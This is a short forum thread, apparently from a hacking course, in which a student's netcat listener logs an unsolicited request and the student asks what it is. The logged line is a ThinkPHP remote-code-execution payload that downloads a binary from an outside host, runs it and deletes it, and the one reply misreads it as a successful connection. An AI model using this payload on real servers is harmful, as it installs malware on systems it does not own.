- This topic has 3 replies, 2 voices, and was last updated 2 years, 12 months ago by .
- You must be logged in to reply to this topic.
I ran the Bash command listener being nc -vv etc from m kali VM and I got back this:
connect to [192.168.1.10] from 114-39-236-143.dynamic-ip.hinet.net [184.108.40.206] 10275
GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars=shell_exec&vars=’wget http://220.127.116.11/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
Accept-Encoding: gzip, deflate
sent 0, rcvd 320
I hadn’t started the bash on any other device at this stage so very curious to know what it means? Is someone connecting to me to infiltrate instead of the other way around?
Please help as got me a little worried.
Which bash command are you referring to?
this is the listener for the bash being nc -vv -l -p 8080 . referenced in lecture 13.1
Ok so it seems like you got a connection back, did you try running any commands after that?
Strictly Necessary Cookie should be enabled at all times so that we can save your preferences for cookie settings.
This website uses Google Analytics and Linkedin to collect anonymous information such as the number of visitors to the site, and the most popular pages.
Keeping this cookies enabled helps us to improve our website.
Please enable Strictly Necessary Cookies first so that we can save your preferences!